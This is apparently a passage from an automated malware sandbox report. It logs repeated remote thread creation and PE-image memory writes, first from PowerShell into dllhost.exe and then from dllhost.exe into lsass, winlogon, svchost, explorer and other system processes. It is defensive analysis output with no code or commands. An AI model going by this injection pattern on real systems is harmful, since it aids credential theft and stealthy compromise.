                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E621C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24A21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8521C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F321C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14621C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25F21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C321C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CA21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28721C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2BB21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CA21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F521C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11D21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11721C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10A21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A921C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13E21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25B21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B821C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10221C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F421C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28C21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2D021C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DC21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EF21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 23F21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E721C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA21C3Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB162A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE472A8CJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE4A2A8CJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAE230000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 7DB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178740000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\MoUsoCoreWorker.exe base: 1C5C4260000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23A94D50000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF36C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 173E6B70000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 166801F0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 3020000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1EB71E60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3ED0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 227B9BA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 232E3380000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C06DDB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECA6970000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1010000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2AE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2A60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: A90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2DF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 9E0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: EB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: AA0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: FE0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3100000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2B90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: BB0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2C20000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E60000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 24A0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 850000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: D00000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 840000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: F30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1460000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 620000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2D90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2640000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: E40000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2600000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 1590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2F90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 890000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 3020000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 2E90000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 5F0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: CF0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\UzmOdnvxneKyVFSAJvWuhhKmbpoQPXyWSwEfvjXokGipokFNuxaXhyuQLZmXBuPZOcVhMSwFTbL\zCEIgtkVdXqWruTZpBFVjqhx.exe base: 25F0000 value starts with: 4D5AJump to behavior
